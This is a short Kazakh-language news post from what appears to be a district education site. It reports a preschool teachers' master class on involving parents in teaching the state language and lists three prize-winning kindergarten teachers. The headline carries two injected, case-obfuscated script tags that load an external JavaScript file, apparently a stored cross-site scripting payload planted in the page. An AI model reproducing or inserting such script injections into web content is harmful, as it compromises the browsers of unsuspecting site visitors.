Мектепке дейінгі ұйымдардың қазақ тілі мұғалімдерінің «Мемлекеттік тілді оқыту бойынша ата-аналармен жұмысты ұйымдастыру» тақырыбында аудандық мастер-класс өткізу туралы ақпарат.<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

02.03.2021

25.02.2021 ж. «Мемлекеттік тілді оқыту бойынша ата-аналармен жұмысты ұйымдастыру» тақырыбында мектепке дейінгі ұйымдардың қазақ тілі педагогтерімен аудандық шеберлік сыныбы өткізілді. Барлығы шебер сыныпқа 9 қазақ тілі мұғалімдері қатысты.

Шебер сыныптың мақсаты: мемлекеттік тілді көпшілікке тарату, әрбір отбасында мемлекеттік тілде сөйлеуді қалыптастыру, мектепке дейінгі ұйым мен ата-аналар арасындағы байланысты нығайту, ұлттық құндылықтар мен мәдениетті, салт-дәстүрлерді мемлекеттік тіл арқылы насихаттау, балалардың Отанға, елге, туған жерге деген сүйіспеншілігін қалыптастыру және тәрбиелеу.

Сайыстың қорытындысы бойынша 1 орынға «Жұлдыз» балабақшасының қазақ тілі мұғалімі Әскербек Ақдана Болатбекқызы, 2 орынға – «Алтын дән» балабақшасынан Утепова Жадыра Сериковна, 3 орынға «Әдемі-ау» балабақшасынан Ергалиева Наталья Кияковна ие болды.

Жеңімпаздарды құттықтаймыз!

Просмотров: 782


Пікір қосу



Деректерді қолтаңбаға қосу